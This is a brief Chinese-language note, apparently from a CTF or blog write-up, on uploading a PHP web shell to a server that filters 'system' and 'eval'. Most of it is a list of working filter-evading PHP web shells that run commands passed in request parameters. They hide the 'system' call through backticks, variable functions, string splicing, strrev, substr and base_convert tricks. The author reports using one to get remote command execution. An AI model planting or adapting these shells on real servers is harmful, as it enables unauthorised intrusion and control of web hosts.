- 可以直接抓包上传php,但是
systemeval被过滤了 下面是收集的几个免杀脚本
#利用反引号执行系统命令<?=`$_REQUEST[1]`;?>
#利用传参数 <?php $a=$_REQUEST['a']; $b=$_REQUEST['b']; $a($b); ?>#利用拼接 <?php $a='syste'.'m'; ($a)('ls ../'); ?>#拼接 <?php $a = "s#y#s#t#e#m"; $b = explode("#",$a); $c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5]; $c($_REQUEST[1]); ?>#拼接 <?php $a=substr('1s',1).'ystem'; $a($_REQUEST[1]); ?>#利用反转字符 <?php $a=strrev('metsys'); $a($_REQUEST[1]); ?>#利用数学函数 <?php $pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi{abs})($$pi{acos}); # get传参 abs=system&acos=ls这里我直接利用第四个进行绕过,上传,执行命令
- 传参数,执行rce
若有收获,就点个赞吧
0 人点赞
